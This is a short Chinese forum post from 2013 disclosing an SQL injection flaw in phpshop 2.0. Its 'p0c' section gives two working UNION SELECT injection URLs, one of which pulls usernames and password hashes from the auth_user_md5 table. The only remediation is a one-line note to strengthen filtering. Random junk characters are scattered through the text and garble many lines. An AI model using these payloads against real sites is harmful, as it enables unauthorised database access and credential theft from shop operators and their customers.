标题 : phpshop 2.0 SQL Injection Vulnerability
2 L, [, J) r' J. l0 I7 r% M" E) U; Q4 a2 t8 m. K
作者 : By onestree
$ K9 l% k, {, ?$ n2 n下载地址 : http://code.google.com/p/phpshop/downloads/list) h- y Y# |# E# |
测试地址: windows 7 / ubuntu
! n* s1 U2 Y7 J% G* x
* f+ `+ o q# ^% E$ y" c ! m$ l$ I* A# L* q1 n$ Q) e
SQLi p0c:0 ]3 J7 H, k# `7 C. _# \
, m9 e7 F+ d* K6 V
==================
3 H9 p$ g( F4 ~) p K
7 w7 {: m7 {( J" G W, Yhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11', w8 U# Z2 \% i5 ^' r1 Z" l
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
; B* R5 e/ `( H( ~: X / D! E: l1 t* w" ?: ?. {
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--. _2 O1 }9 H8 s
, J+ F+ U4 b8 b
修复:
, ^) z1 O" Z8 M3 n+ H! F1 [加强过滤$ L3 \5 @1 t9 z7 K0 E( h- z
3 |- w* S$ G1 g* M t- Z9 S
1 k2 ~/ N8 Q( R; h* s |
发表于 2013-1-18 18:24:10
收藏
支持
反对